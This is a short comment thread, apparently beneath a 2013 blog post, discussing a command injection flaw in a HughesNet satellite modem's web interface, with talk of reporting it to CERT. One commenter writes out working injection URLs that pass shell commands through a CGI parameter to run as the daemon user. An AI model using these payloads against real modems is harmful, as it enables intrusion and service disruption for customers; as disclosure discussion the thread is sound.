6 Responses

  1. Robert Bibey
    Robert Bibey August 31, 2013 at 6:16 pm |

    Wow – I can honestly say this caught me offguard – excellent find though – makes me wonder if there’s other security issues related with this terminal – I am able to duplicate your entries on my term btw :) THanks for this and I’ll make sure it gets to the right people :)

    Reply
  2. James 1979
    James 1979 September 2, 2013 at 4:23 pm |

    I assume that you realize that sh can be invoked directly such as http://192.168.0.1/cgi-bin/command.cgi?Command=314&;sh%09-c%09%27who;pwd;date%27 .The commands will be executed as the user daemon. Be sure to try out the “whoCares” command in /bin:

    http://192.168.0.1/cgi-bin/command.cgi?Command=314&;sh%09-c%09%27whoCares%27

    Command cannot be executed. URI: /wac_userdisable query: Hi, Mom!

    Reply
  3. anon
    anon September 2, 2013 at 4:51 pm |

    the 1100 is simply a 1000 with an added usb port, no other differences.

    Reply
  4. James 1979
    James 1979 September 4, 2013 at 12:57 pm |

    Cody, on the HughesNet community, I just suggested that you might consider contacting CERT at http://www.cert.org/contact_cert/ I can contact them too if you’d like since I know what commands will disable the modem. I imagine that HughesNet is already working on a fix, but I think that all browsers should give a warning if the browser encounters an address reserved for LANs. Even if HughesNet fixes the “extra commands to the shell” bug, someone could still execute arbitrary commands on the SCC (disable Web acceleration, etc.) and cause trouble for HughesNet and their customers.

    Reply

Leave a Reply